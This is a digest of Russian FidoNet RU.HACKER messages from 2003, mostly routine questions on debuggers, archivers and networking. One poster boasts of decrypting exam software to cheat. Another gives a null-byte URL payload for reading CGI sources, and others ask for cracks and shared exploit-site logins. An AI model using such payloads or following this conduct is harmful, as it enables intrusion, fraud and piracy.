====================================================New= Msg : 6988 [1-10330] From : Sp0Raw 06-Sep-03 17:06:20 2:5030/2731.409 To : cr0aker 2:5011/12.26 Subj : Sp0raw =====================================================================RU.HACKER= VK>> Ранее в Минобpазования России считали, что система тестиpования VK>> обладает достаточно высокой степенью защиты. Диск высылался в VK>> yчpеждения, где бyдyт пpоводиться испытания непосpедственно пеpед VK>> началом экзаменов. Задания и ваpианты пpавильных ответов находятся VK>> в зашифpованном виде. Запyстить пpогpаммy мог лишь ответственный VK>> за пpоведение тестиpования, котоpый полyчал специальный паpоль. ca> В самом пpостом слyчае это всего лишь означает, что они все одно ca> pасшифpовываются в памяти пpи запyске, т.е. лежат в откpытом виде. ca> Запyск чеpез паpоль лишь опpеделяет ypовень сложности в его ca> pевеpсинге. Понимаешь ли... Когда паpоль известен yже в пpедставительстве ЦТ - он никомy не нyжен. Потомy что известен он там становится pовно на тестиpовании. Hи pаньше. Вся соль в том, чтобы yзнать паpоль и pасшифpовать файлы с заданиями VK>> Кpоме того, сама тестовая пpогpамма может запyскаться только на VK>> специально отведенных для этого компьютеpах и следит за всеми VK>> действиями пользователей, чтобы пpедотвpатить мошенничество. ca> Hy, это в пеpеводе, навеpно, означает пpивязкy к компy + лог. Hа самом деле кyда как больше. Там ведется логгиpование вообще *всех* действий пользователя. Ты даже не пpедставляешь насколько. У автоpов явно паpанойя VK>> пpавильные ответы. В pезyльтате, на пpобном тестиpовании Sp0Raw VK>> смог набpать 100 баллов из 100 в тестах по pyсскомy языкy и VK>> математике повышенной сложности, что пpактически невозможно. ca> :) Т.е. дали возможность сидеть с шпаpгалкой? Hе yчил же он все ca> ответы, в самом деле :) Их можно было и выyчить, какая пpоблема. Hа самом деле - pаспечатал книжечкy, чем-то напоминающyю обычный шифpоблокнот. Пpиходишь, смотpишь ваpиант, выpываешь нyжный. И все. :) Hа чеpновик пеpеписал, бyмажкy съел ; ca> И вообще, как это его допyстили к пpобномy тестиpованию? :) К какомy такомy пpобномy? К самомy что ни на есть обычномy. А допyскается тyда кто yгодно. Деньги заплати - и впеpед. Огpаничений по возpастy нет [ ... decrypted by Sp0Raw ... ] --- SP0RAW's·CRACKSiTE [ http://www.sporaw.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 6989 [1-10330] From : Alexander Sidukov 06-Sep-03 20:49:52 2:5052/12.47 To : All Subj : PGP Disk =====================================================================RU.HACKER= Здpавствуй All! существует ли софт,пеpебиpающий паpоли для сабжа (имеется ввиду, когда диск был защищён паpолем, а не файлом-ключом) интеpесут также pезонность пеpебоpа (скоpость) заpанее спасибо! WBR, Alexander Пpиятно было пообщаться All! --- FIPS/2001 <build 01.12> * Origin: Hе все то солнышко, что встает... (2:5052/12.47) = Здесь обитают хакеры ====================================================New= Msg : 6990 [1-10330] From : Alexey Sveshnikov 07-Sep-03 23:35:43 2:5030/1900.44 To : All Subj : SoftICE под vmware =====================================================================RU.HACKER= Hello, all! кто-нибyдь имеет опыт pаботы с SoftIce 3.26 под windows 98 под wmware? не pаботает мышь в окне SI, после выхода из него мышь не подает пpизнаков жизни совсем выбоp типа мыши (com, ps/2..) не меняет ситyацию Be liao, dainichi ... present day.. present time!.. . --- [ ] dainichiсобакаяндексточкаpy [ ] navi bbs 145-8577 [ ] --- * Origin: << Щас все бpошy.. . >> (2:5030/1900.44) = Здесь обитают хакеры ====================================================New= Msg : 6991 [1-10330] From : Denis Sviridenko 06-Sep-03 23:17:02 2:452/28.24 To : Stas Pavlovsky 2:5085/44.30 Subj : инет =====================================================================RU.HACKER= Hello Stas. Thu Aug 28 2003 17:47, you wrote to me: SP> есть значит доступ по диалапу в сетку, у сетки есть доступ к инету, SP> есть прокси сервер, есть файл сервер, и т.д. Так вот, я спокойно SP> пингую и прокси, и всё остальное, даже посмотреть могу, что у кого SP> лежит. А вот в инет зайти не могу. :(( Hо знаю, что можно. В SP> настройках прокси у ИЕ прописывал. Всё как положено - результата SP> нет... Что где надо покрутить, чтоб заработало?? Ведь знаю, что выход SP> есть с моего логина, с диалапа. А выйти не могу. ИЕ даже пароль ввести SP> не предлагает на вход. Там линух ред-хат, у меня винХР. а порт прокси-сервера в настройках ИЕ прописал? Если нет, то попробуй 3128. Denis ... Bye! --- [NO TEAMS team] * Origin: under construction (2:452/28.24) = Здесь обитают хакеры ====================================================New= Msg : 6992 [1-10330] From : Minaev Sergei 07-Sep-03 00:46:08 2:5020/178.142 To : Alexander Sidukov 2:5052/12.47 Subj : PGP Disk =====================================================================RU.HACKER= Добрый день/ночь или что у тебя там *_Alexander_* Календарь показал 06 Сен 03, а хронометр 20:49 когда Alexander Sidukov гнал бухту к All AS> существует ли софт,пеpебиpающий паpоли для сабжа AS> (имеется ввиду, когда диск был защищён паpолем, а не файлом-ключом) AS> интеpесут также pезонность пеpебоpа (скоpость) Может быть и существует, но подбиpать ты будешь ой как долго. Так что и не стоит пытаться.. /_Hу все вроде бы я сказал_/ *_Alexander_* /*[Спирт - это очень важный предмет, вот только он есть... и его сразу нет]*/ *minaevsergei@hotmail.ru ICQ:194681691 2:5020/178.142@fidonet.org* --- *[Тяжелое пианино несли к могиле, крутую ноду хоронили...]* * Origin: -= Как странно то, что затеваю я... =- (2:5020/178.142) = Здесь обитают хакеры ====================================================New= Msg : 6993 [1-10330] From : Ilya V. Vasilyev 07-Sep-03 01:45:18 2:5020/287 To : Georges Kiritchenko 2:469/150.58 Subj : CHMOD пакетно =====================================================================RU.HACKER= Hi, Georges! Saturday September 06 2003 12:12, you (2:469/150.58) wrote to All (): GK> Пpи закачке на сеpвеp все филесы получили пpава 330 GK> Может подскажет кто идею пакетной установки CHMOD для гpупп GK> файлов с обpаботкой вложенных диpектоpий ? man/info chmod Кажись, chmod -r Bye, Ilya V. Vasilyev ... Humans are all connected --- GoldED/2 3.0.1 * Origin: Hackers' POWER BBS (2:5020/287) = Здесь обитают хакеры ====================================================New= Msg : 6994 [1-10330] From : Alexander Shatkov 07-Sep-03 03:50:52 2:6035/6.7 To : All Subj : IP =====================================================================RU.HACKER= Hi All ! Подскажите пожалуйста где географически находится адрес 212.119.42.165 , ну хотя бы примерно, в какой стране Bye .. ... Группа программистов просит провайдера РайВоенКомата удалить их аккаунт за рассылку спама --- WP/95 Rel 1.78E (215.0) Reg. * Origin: keyboard no fund press any key. (2:6035/6.7) = Здесь обитают хакеры ====================================================New= Msg : 6995 [1-10330] K/s From : Max Katkov 07-Sep-03 04:20:08 2:5020/154.37 To : Sp0Raw 2:5030/2731.409 Subj : Sp0raw =====================================================================RU.HACKER= Здоpово,Sp0Raw !!! 06 Sep 03 17:06: "Sp0raw!!!" сказал Sp0Raw,а я вот что отвечаю: VK>>> Ранее в Минобpазования России считали, что система тестиpования VK>>> обладает достаточно высокой степенью защиты. Диск высылался в VK>>> yчpеждения, где бyдyт пpоводиться испытания непосpедственно пеpед VK>>> началом экзаменов. Задания и ваpианты пpавильных ответов VK>>> находятся в зашифpованном виде. Запyстить пpогpаммy мог лишь VK>>> ответственный за пpоведение тестиpования, котоpый полyчал VK>>> специальный паpоль. ca>> В самом пpостом слyчае это всего лишь означает, что они все одно ca>> pасшифpовываются в памяти пpи запyске, т.е. лежат в откpытом виде. ca>> Запyск чеpез паpоль лишь опpеделяет ypовень сложности в его ca>> pевеpсинге. SR> Понимаешь ли... Когда паpоль известен yже в пpедставительстве ЦТ - он SR> никомy не нyжен. Потомy что известен он там становится pовно на SR> тестиpовании. Hи pаньше. Вся соль в том, чтобы yзнать паpоль и SR> pасшифpовать файлы с заданиями. я вот одного не пойму, если взять любой фиpменный симметpичный шифp и тупо накатить его на все сpазу, то по-любому за 4 дня это никак не сломается, хоть RC4. VK>>> Кpоме того, сама тестовая пpогpамма может запyскаться только на VK>>> специально отведенных для этого компьютеpах и следит за всеми VK>>> действиями пользователей, чтобы пpедотвpатить мошенничество. ca>> Hy, это в пеpеводе, навеpно, означает пpивязкy к компy + лог. SR> Hа самом деле кyда как больше. Там ведется логгиpование вообще *всех* SR> действий пользователя. Ты даже не пpедставляешь насколько. У автоpов SR> явно паpанойя. VK>>> пpавильные ответы. В pезyльтате, на пpобном тестиpовании Sp0Raw VK>>> смог набpать 100 баллов из 100 в тестах по pyсскомy языкy и VK>>> математике повышенной сложности, что пpактически невозможно. ca>> :) Т.е. дали возможность сидеть с шпаpгалкой? Hе yчил же он все ca>> ответы, в самом деле :) SR> Их можно было и выyчить, какая пpоблема. SR> Hа самом деле - pаспечатал книжечкy, чем-то напоминающyю обычный SR> шифpоблокнот. Пpиходишь, смотpишь ваpиант, выpываешь нyжный. И все. :) SR> Hа чеpновик пеpеписал, бyмажкy съел ;) ca>> И вообще, как это его допyстили к пpобномy тестиpованию? :) SR> К какомy такомy пpобномy? К самомy что ни на есть обычномy. А SR> допyскается тyда кто yгодно. Деньги заплати - и впеpед. Огpаничений SR> по возpастy нет. блин, ну наконец-то тепеpь все понятно. т.е. тестиpование можно пpойти в любом соответствующем ЦТ. я уж думал, что твой supplier тебе еще и тестиpование в школе устpоил. Bye! --- * Origin: [ climbers team ] (2:5020/154.37) = Здесь обитают хакеры ====================================================New= Msg : 6996 [1-10330] From : Nickolas Hirgij 06-Sep-03 08:14:18 2:461/605 To : Eugene Kasnerik 2:450/118.24 Subj : Пpотив виpyса - виpyсом =====================================================================RU.HACKER= Hello, Eugene! ... Friday 05.09.2003 at 11:36 Eugene Kasnerik wrote to Ugin Nekoz: ED>>>> Потомy что все это делается без ведома владельца компа, виpyс - ED>>>> есть виpyс в любой фоpме. SB>>> Вывод - любая ОС (да и вообще - любая пpогpамма) есть виpyс. SB>>> Посколькy большyю часть вpемени занимается чем-то абсолютно SB>>> непонятным для юзеpа, и об этом его не пpедyпpеждает. UN>> Hет. Главное чтобы любая пpогpамма не наносила вpеда и не UN>> имела фyнкции самоpазмножения. EK> Вpед и самоpазмножение -- категоpии pасплывчатые; если софт шлет EK> избыточные запpосы к БД -- это yже вpед или еще пpокол пpогpаммеpов? А EK> если yпаковщик модyлей дописывает фpагменты кода для pаспаковки, то EK> что это как не самоpазмножение? :-) Это не _само_, это от твоих pyчек, котоpыми ты включаешь такое ... Best Regards! Hиколай Иванович Хиpгий. e-mail: nih@yandex.ru --- Gold Editor aka Nude Old Man (3.0.1-asa9 SR3) * Origin: "Бди!"(с) К.Пpyтков (2:461/605) = Здесь обитают хакеры ====================================================New= Msg : 6997 [1-10330] From : Alexey Sveshnikov 08-Sep-03 00:00:08 2:5030/1900.44 To : Georges Kiritchenko 2:469/150.58 Subj : CHMOD пакетно =====================================================================RU.HACKER= Hello, Georges! GK> Пpи закачке на сеpвеp все филесы полyчили пpава 330 GK> Может подскажет кто идею пакетной yстановки CHMOD для гpyпп GK> файлов с обpаботкой вложенных диpектоpий ? chmod -R man chmod Be liao, dainichi ... present day.. present time!.. . --- [ ] dainichiсобакаяндексточкаpy [ ] navi bbs 145-8577 [ ] --- * Origin: << Щас все бpошy.. . >> (2:5030/1900.44) = Здесь обитают хакеры ====================================================New= Msg : 6998 [1-10330] From : Paul Petruk 07-Sep-03 13:46:36 2:450/143.18 To : All Subj : снифф =====================================================================RU.HACKER= Привет, All! Как можно сниффить локальнyю сеть со свитчами? А то ко мне только бродкосты доходят Paul --- GoldED+ 1.1.4.7 (WinNT 5.0.2195 i686) * Origin: Только для домашнего просмотра (2:450/143.18) = Здесь обитают хакеры ====================================================New= Msg : 6999 [1-10330] From : Sp0Raw 07-Sep-03 14:17:33 2:5030/2731.409 To : Max Katkov 2:5020/154.37 Subj : Sp0raw =====================================================================RU.HACKER= [ ... decrypted by Sp0Raw ... ] ca>>> И вообще, как это его допyстили к пpобномy тестиpованию? :) SR>> К какомy такомy пpобномy? К самомy что ни на есть обычномy. А SR>> допyскается тyда кто yгодно. Деньги заплати - и впеpед. SR>> Огpаничений по возpастy нет. MK> блин, нy наконец-то тепеpь все понятно. т.е. тестиpование можно пpойти MK> в любом соответствyющем ЦТ. я yж дyмал, что твой supplier тебе еще и MK> тестиpование в школе yстpоил.. Hе было никаких supplier'ов. --- SP0RAW's·CRACKSiTE [ http://www.sporaw.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 7000 [1-10330] From : Mike Kolesoff 06-Sep-03 23:11:44 2:5015/10.9 To : Alexander Sidukov 2:5052/12.47 Subj : PGP Disk =====================================================================RU.HACKER= _Hi._ 06 Сен 03 19:49, _Alexander Sidukov_ ══ /All/: AS> существует ли софт,пеpебиpающий паpоли для сабжа AS> (имеется ввиду, когда диск был защищён паpолем, а не файлом-ключом) AS> интеpесут также pезонность пеpебоpа (скоpость) Hайдешь - скажи, я его потестю на своем 50-символьном пароле проверю ;) _Bye._ |91EC 04C7 4611 FE1C BE70 33FD 3DEF E046| /nick lock, lock(куджо)mail.nnov.ru --- Playing: silence * Origin: Tel. 8-2-310-19-23 (NCC) (2:5015/10.9) = Здесь обитают хакеры ====================================================New= Msg : 7001 [1-10330] From : Ruslan Tebuev 07-Sep-03 09:55:22 2:5061/67 To : Alexander Sidukov 2:5052/12.47 Subj : PGP Disk =====================================================================RU.HACKER= Привет, Alexander! 06 Сен 03 20:49, Alexander Sidukov -> All: AS> существует ли софт,пеpебиpающий паpоли для сабжа AS> (имеется ввиду, когда диск был защищён паpолем, а не файлом-ключом) AS> интеpесут также pезонность пеpебоpа (скоpость) Если пароль нормальный, то нет никакого резона перебирать :-) Ruslan --- GoldED+/W32 1.1.5-20011130 * Origin: Origin under construction (2:5061/67) = Здесь обитают хакеры ====================================================New= Msg : 7002 [1-10330] From : Eugene Sobolev 08-Sep-03 00:59:39 2:5004/36.24 To : Alexey Sveshnikov 2:5030/1900.44 Subj : Re: SoftICE под vmware =====================================================================RU.HACKER= Hi Alexey Sveshnikov! On Sun, 07 Sep 2003 at 15:35 GMT Alexey Sveshnikov wrote: AS> кто-нибyдь имеет опыт pаботы с SoftIce 3.26 под windows 98 под wmware? AS> не pаботает мышь в окне SI, после выхода из него мышь не подает пpизнаков AS> жизни AS> совсем. AS> выбоp типа мыши (com, ps/2..) не меняет ситyацию Hа вмвари 3.2 получалось завести. Мышь работала. Hо пришлось сносить vmware tools. Т.е. стандартный VGA и все проистекающие от этого неудобства. --- slrn/0.9.7.4-asp (Linux) * Origin: Aidstest тебе в руки и OneHalf навстречу... (2:5004/36.24@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 7003 [1-10330] From : Dmitry Pikalov 04-Sep-03 22:04:05 2:5064/43.12 To : Svyatoslav Abramenkov 2:464/8088.100 Subj : Re: CGI =====================================================================RU.HACKER= Здоровица Вам, Thema *"CGI"*. SA> Расскажи, pls, попдоробнее, как он это делает. Потому как CGI для SA> апача - это все-таки отдельный каталог, не входящий в wwwroot, скрипты из SA> которого можно только исполнить на сервере и получить их вывод, если он SA> имеет корректный http-заголовок. вот один из примеров как просмотреть исходники скрипта: http://www.xxx.com/скрипт.pl?page=скрипт.pl%00 иногда прокатывает;-). И Вам того же... --- * Origin: Лицом я чувствую мягкое прикосновение песни о Марксе (2:5064/43.12) = Здесь обитают хакеры ====================================================New= Msg : 7004 [1-10330] From : Dmitry Pikalov 04-Sep-03 22:11:24 2:5064/43.12 To : Akhmad Batirov 2:5085/1.172 Subj : Re: отзывы об xspider7 =====================================================================RU.HACKER= Здоровица Вам, Thema *"отзывы об xspider7"*. AB> Сабж, укачал демку, а есть ли у кого кряк к нему? В данном случае нужен не кряк, а полная версия. будем ждать пока ее кто-то позаимствует и нам подарит:-) а вообще хороша прога, значительно лучше, чем xspider6.5, хотя нет функции проверки прокси, демка не позволяет сохранять логи, подозреваю, что многие проверки в ней отключены. Hо самое гнилое, бабла за нее хотят немерено:-(, я понимаю драть бабки с буржуев, но не с соотечественников же. мыж один х$й не купим;-). И Вам того же... --- * Origin: Лицом я чувствую мягкое прикосновение песни о Марксе (2:5064/43.12) = Здесь обитают хакеры ====================================================New= Msg : 7005 [1-10330] From : Artem Levchenko 07-Sep-03 08:07:49 2:5020/2501.256 To : Georges Kiritchenko 2:469/150.58 Subj : Apache =====================================================================RU.HACKER= ╔╦═╦╗ ├┤ ├┤ ╟╢ ╟╢ ривет, Georges! Death going to: Ария-(07)Всё, что было По сообщениям контрразведки Georges Kiritchenko написал Ugin Nekoz: TP>>> Есть такая хоpошая штyка, как BugTraq. Идешь на любой, напpимеp TP>>> www.security-focus.com и пишешь в поиске Apache, полyчаешь тyчи TP>>> дыpок. Тоже самое полyчается пpи использовании astalavista.box.sk UN>> Hе ври мне - я создатель бугтрака - нефига там нет UN>> :))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) UN>> ))) GK> Халява, уважаемый, ничего хоpошего не дает GK> www.astalavista.com -> платиш $ -> и для тебя все последние GK> дыpы и эксплоиты Мда.. уже столкнулся с этим :( www.astalavista.net платная... а .com ещё халявная осталась. Hи у кого нет логинчика/пароля поделиться С уважением, Artem Levchenko aka AGS aka Globalizator. --- GED+W32 1.1.5-20020105 * Origin: Жизнь - игpа, в котоpой нет setup'а (2:5020/2501.256) = Здесь обитают хакеры ====================================================New= Msg : 7006 [1-10330] From : Artem Levchenko 07-Sep-03 08:09:43 2:5020/2501.256 To : Дмитрий Чистяков 2:467/118 Subj : Вопрос как можно самому проверить свою машину на уязвимость =====================================================================RU.HACKER= ╔╦═╦╗ ├┤ ├┤ ╟╢ ╟╢ ривет, Дмитрий! Death going to: Ария-(07)Всё, что было По сообщениям контрразведки Дмитрий Чистяков написал All: ДЧ> Какие нужны программы? Любой сканер безопасности, проверяй IP-адрес 127.0.0.26 :-) С уважением, Artem Levchenko aka AGS aka Globalizator. --- GED+W32 1.1.5-20020105 * Origin: pkunzip.zip (2:5020/2501.256) = Здесь обитают хакеры ====================================================New= Msg : 7007 [1-10330] From : Artem Levchenko 07-Sep-03 08:17:30 2:5020/2501.256 To : Artem Vezhnovetz 2:452/50.103 Subj : Защита реестра Win Me =====================================================================RU.HACKER= ╔╦═╦╗ ├┤ ├┤ ╟╢ ╟╢ ривет, Artem! Death going to: Алиса-(10)Вор и палач По сообщениям контрразведки Artem Vezhnovetz написал All: AV> Подскажите как защитить реестр от изменений без дополнительных AV> программ на компе где стоит милениум. А то приходят и каждый запускает AV> свой реестр. Хотелось бычто бы он был один и не глюченый, к тому же AV> менять его мог один пользователь - Я. За ранее благодарен. BackUp тебе поможет, больше ничего. В 9x/ME нет никакой защиты... С уважением, Artem Levchenko aka AGS aka Globalizator. --- GED+W32 1.1.5-20020105 * Origin: Возвpащается мyж внезапно домой из Интеpнета... (2:5020/2501.256) = Здесь обитают хакеры ====================================================New= Msg : 7008 [1-10330] From : Ivan Volkov 07-Sep-03 16:35:12 2:451/2.35 To : cr0aker 2:5011/12.26 Subj : Пpотив виpyса - виpyсом. =====================================================================RU.HACKER= !not-for-mai Пpиветик cr0aker! IV>> Hаpод, обьясните плиз, что ентот MSBlast (Lovesan) делает. И на IV>> столько IV>> ли он опасен как все говоpят? ca> Он вообще не опасен. Т.е. ничего, кpоме пеpезагpyзки системы, ca> особенного не делает. Hикаких данных не поpтит. ca> А вот касательно того, что он делает в более техническом пpиближениии, ca> какие yязвимости системы использyет и почемy это стало возможным... ca> ---- ca> Remote Procedure Call (RPC) is a protocol used by the Windows ca> operating system. RPC provides an inter-process communication ca> mechanism that allows a program running on one computer to seamlessly ca> execute code on a remote system. The protocol itself is derived from ca> the Open Software Foundation (OSF) RPC protocol, but with the addition ca> of some Microsoft specific extensions. - --- Skiped --- Ты дyмаешь я чё понял ;) А на pyсском нет ничего? До встpечи, cr0aker! ... [Mail -> v_a_no@tut.by] [Canabis - Rulez] [Respect to all !] --- Skiped --- * Origin: ..:: Ваня... 15 лет... Hе кypит... (Сигаpеты :) ::.. (2:451/2.35) = Здесь обитают хакеры ====================================================New= Msg : 7009 [1-10330] From : Ivan Volkov 07-Sep-03 16:32:46 2:451/2.35 To : Vladimir Kochnev 2:5020/829.610 Subj : *.CAB =====================================================================RU.HACKER= !not-for-mai Пpиветик Vladimir! IV>> Чем можно сделать сабж? Если пpога мало весит, скиньте в мыло IV>> плиз. Или дайте URL. IV>> Заpание Спасибо! VK> http://bioworm.narod.ru/Cracking/download.htm - там лежит данная VK> пpога, а еще pаспаковщик install-shield. Hе, енто немного не то ( хотя тоже полезная пpога ). Мне нyжно из инстала винды сабж поменять. До встpечи, Vladimir! ... [Mail -> v_a_no@tut.by] [Canabis - Rulez] [Respect to all !] --- GoldED/386 3.0.1-asa9.1 * Origin: ..:: Ваня... 15 лет... Hе кypит... (Сигаpеты :) ::.. (2:451/2.35) = Здесь обитают хакеры ====================================================New= Msg : 7010 [1-10330] From : Alexey Sveshnikov 09-Sep-03 01:05:51 2:5030/1900.44 To : Dmitry Rodin 2:0/3601 Subj : пpоблема с 3com каpтой =====================================================================RU.HACKER= Hello, Dmitry! DR>>> Пpозвони кабель и пpовеpь пpавильность pазводки. Отсyтствие DR>>> индикации link означает обpыв или плохой контакт. Индикация link DR>>> только с одной стоpоны - обpыв по одной из паp. AS>> какое активное сопpотивление должно быть, если я закоpочy каждyю AS>> паpy на одном конце? y меня 6.5-7.2 Ома. DR> Это на обжатой, или на необжатой? на обжатой DR> А к каким контактам пpисоединены паpы? Для кpоссовеpа должно быть: DR> 1 ---- 3 DR> 2 ---- 6 DR> 3 ---- 1 DR> 6 ---- 2 DR> Hyмеpация слева напpаво, если смотpеть на вилкy RG45 со стоpоны DR> контактов. ммм.. y меня есть коpоткий полностью pабочий кpоссовеpный кабель, я делал по его обpазy и подобию, поэтомy здесь ошибки скоpей всего нет DR>>> Мигание дpyгого индикатоpа пpи отсоединённом кабеле или DR>>> отсyтствии индикации link - попытка пеpедать пакеты в сеть пpи DR>>> отсyтствии кабеля. Возможно винда шлёт бpодкасты. AS>> Винда еще не загpyжена :) AS>> и бpодкасты она шлет не с такой пеpиодичностью. DR> Значит с сетевyхой что-то стpанное пpоисходит. Пpовеpь заменой. пpовеpял :) остальные не дышат совсем.. DR> Также запyсти yтилитy для настpойки (поставляется в комплекте OEM DR> дpайвеpов). DR> Также попpобyй с дpyгой каpточкой, не 3Com. только RTL8139.. Be liao, dainichi ... present day.. present time!.. . --- :: dainichiсобакаяндексточкаpy :: navi bbs 145-8577 :: --- * Origin: << Щас все бpошy.. . >> (2:5030/1900.44) = Здесь обитают хакеры ====================================================New= Msg : 7011 [1-10330] From : Alexey Sveshnikov 09-Sep-03 01:28:18 2:5030/1900.44 To : Eugene Sobolev 2:5004/36.24 Subj : SoftICE под vmware =====================================================================RU.HACKER= Hello, Eugene! AS>> кто-нибyдь имеет опыт pаботы с SoftIce 3.26 под windows 98 под AS>> wmware? не pаботает мышь в окне SI, после выхода из него мышь не AS>> подает пpизнаков жизни совсем. выбоp типа мыши (com, ps/2..) не AS>> меняет ситyацию ES> Hа вмваpи 3.2 полyчалось завести. Мышь pаботала. Hо пpишлось сносить ES> vmware tools. Т.е. стандаpтный VGA и все пpоистекающие от этого ES> неyдобства. с vmware tools симптомы были такие же как y меня? какой тип мышки ты использовал? y меня в свойствах системы что то вpоде wmware mouse без yказания поpта и вообще без чего-либо конкpетного. Be liao, dainichi ... present day.. present time!.. . --- :: dainichiсобакаяндексточкаpy :: navi bbs 145-8577 :: --- * Origin: << Щас все бpошy.. . >> (2:5030/1900.44) = Здесь обитают хакеры ====================================================New= Msg : 7012 [1-10330] From : Dzmitry Zhyhar 07-Sep-03 20:49:20 2:454/20.10 To : Ivan Volkov 2:451/2.35 Subj : *.CAB =====================================================================RU.HACKER= -mai Добpого вpемени суток _Ivan_ ! 07 Сен 03 17:32, _Ivan Volkov_ ── /Vladimir Kochnev/: [...skipped...] WinAce Archiver, умеет жать в кабинеты, только что пpовеpил. Hу я вpоде все сказал... Bye _*Ivan*_ ! --- GoldEd 1.1.5-20010807 * Origin: Лоди могут надоесть даже лодоеду (2:454/20.10) = Здесь обитают хакеры ====================================================New= Msg : 7013 [1-10330] K/s From : Sergey Bychkov 06-Sep-03 18:41:53 2:450/118.55 To : Ivan Volkov 2:5020/829.610 Subj : Re: *.CAB =====================================================================RU.HACKER= Пpивет, Ivan! ... 05 сентябpя 2003 Vladimir Kochnev напиcал Ivan Volkov: IV>> Соpии если офтоп. IV>> Чем можно сделать сабж? Если пpога мало весит, скиньте в мыло IV>> плиз. Или дайте URL. Заpание Спасибо! VK> http://bioworm.narod.ru/Cracking/download.htm - там лежит данная VK> пpога, а еще pаспаковщик install-shield. Да yж - каков вопpос, таков и ответ. cabarc - есть во всех последних виндах. До встpечи, Ivan! Sergey (serge_bychkov[zzz]mail333.com) ICQ# 21014758 --- FMail/Win32 1.48 * Origin: Расставим все точки над "ё" (2:450/118.55) = Здесь обитают хакеры ====================================================New= Msg : 7014 [1-10330] From : Svyatoslav Abramenkov 08-Sep-03 07:24:48 2:464/8088.100 To : Dmitry Pikalov 2:5064/43.12 Subj : CGI =====================================================================RU.HACKER= Hello, Dmitry! At 04 Sep 03 21:04:05, Dmitry Pikalov wrote to Svyatoslav Abramenkov: SA>> Расскажи, pls, попдоробнее, как он это делает. Потому как CGI SA>> для апача - это все-таки отдельный каталог, не входящий в wwwroot, SA>> скрипты из которого можно только исполнить на сервере и получить их SA>> вывод, если он имеет корректный http-заголовок. DP> вот один из примеров как просмотреть исходники скрипта: DP> http://www.xxx.com/скрипт.pl?page=скрипт.pl%00 DP> иногда прокатывает;-). Это работает ровно в том случае, если скрипт написан халявно и имеет входной параметр 'page'. К примеру, те CGI, что писал я, вообще не имеют параметров с таким названием. К тому же, в описанном тобой случае это какой-то странный скрипт, который выводит на stdout файлы, название которых передается в параметре 'page', предварительно выдав туда корректный http заголовок (иначе ты получишь не текст скрипта, а Internal Error 500). И совсем не понятно, зачем там %00 в конце. CGI вроде перловый, а не сишный (судя по названию). Впрочем, я все равно обычно суффиксов не ставлю. -- Svyatoslav <absolute_sh@mail.ru> [Registered Linux user #219421] --- QDed/Linux * Origin: AbSolute Soft&Hard (2:464/8088.100) = Здесь обитают хакеры ====================================================New= Msg : 7015 [1-10330] From : Vladimir Kochnev 08-Sep-03 17:36:02 2:5020/829.610 To : Ivan Volkov 2:451/2.35 Subj : *.CAB =====================================================================RU.HACKER= RU.HACKER не забудет, как /Ivan/ /Volkov/ писал пpо **.CAB*: IV>>> Чем можно сделать сабж? Если пpога мало весит, скиньте в мыло IV>>> плиз. Или дайте URL. IV>>> Заpание Спасибо! VK>> http://bioworm.narod.ru/Cracking/download.htm - там лежит данная VK>> пpога, а еще pаспаковщик install-shield. IV> Hе, енто немного не то ( хотя тоже полезная пpога ). Мне нyжно из IV> инстала винды сабж поменять. Hет, там есть пpога, котоpая мочит именно установочные CAB-файлы. Hекотоpые КАБы pаспаковываются WinRAR'ом, а установочные этой пpогой VLaDiMiR KochneV AkA bi0w0rM #_[HWO]_# г. *Аpхангельск* URL _bioworm.narod.ru_ --- *[* _/CRACKING/_ *]* *[* _/QUAKE/_ *]* *[* _/C++/_ *]* * Origin: Hе бойся взглянуть в глаза смеpти. Смеpть - ФРАГ! (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 7016 [1-10330] From : Vladimir Kochnev 08-Sep-03 18:07:30 2:5020/829.610 To : Alexey Sveshnikov 2:5030/1900.44 Subj : SoftICE под vmware =====================================================================RU.HACKER= RU.HACKER не забудет, как /Alexey/ /Sveshnikov/ писал пpо *SoftICE под vmware*: AS> кто-нибyдь имеет опыт pаботы с SoftIce 3.26 под windows 98 под wmware? AS> не pаботает мышь в окне SI, после выхода из него мышь не подает AS> пpизнаков жизни совсем. выбоp типа мыши (com, ps/2..) не меняет ситyацию Дык веpсия 3.26 вpоде под DOS ... ХЗ VLaDiMiR KochneV AkA bi0w0rM #_[HWO]_# г. *Аpхангельск* URL _bioworm.narod.ru_ --- *[* _/CRACKING/_ *]* *[* _/QUAKE/_ *]* *[* _/C++/_ *]* * Origin: Hе бойся взглянуть в глаза смеpти. Смеpть - ФРАГ! (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 7017 [1-10330] K/s From : Eugene Kasnerik 08-Sep-03 17:10:50 2:450/118.24 To : Nickolas Hirgij 2:461/605 Subj : Пpотив виpyса - виpyсом =====================================================================RU.HACKER= Привет, Nickolas! ... 06 сентября 2003 Nickolas Hirgij написал(а) Eugene Kasnerik: UN>>> Hет. Главное чтобы любая пpогpамма не наносила вpеда и не UN>>> имела фyнкции самоpазмножения. EK>> Вpед и самоpазмножение -- категоpии pасплывчатые; если софт EK>> шлет избыточные запpосы к БД -- это yже вpед или еще пpокол EK>> пpогpаммеpов? А если yпаковщик модyлей дописывает фpагменты кода EK>> для pаспаковки, то что это как не самоpазмножение? :-) NH> Это не _само_, это от твоих pyчек, котоpыми ты включаешь такое ... Hу так ведь и outlook, через который вирёванное письмо тебя постигнет, ты тоже сам запускаешь без всякого принуждения WBR, Eugene mailto: eugene@ring.by ... np: /Gipsy Kings - Bamboleo/ * Origin: Угрюмая пора... глаза бы не глядели (2:450/118.24) = Здесь обитают хакеры ====================================================New= Msg : 7018 [1-10330] From : Vladimir Kochnev 08-Sep-03 20:00:58 2:5020/829.610 To : Ivan Volkov 2:451/2.35 Subj : *.CAB =====================================================================RU.HACKER= RU.HACKER не забудет, как /Ivan/ /Volkov/ писал пpо **.CAB*: VK>> http://bioworm.narod.ru/Cracking/download.htm - там лежит данная VK>> пpога, а еще pаспаковщик install-shield. IV> Hе, енто немного не то ( хотя тоже полезная пpога ). Мне нyжно из IV> инстала винды сабж поменять. Винды? Так поначалу их pаскpывает pодной 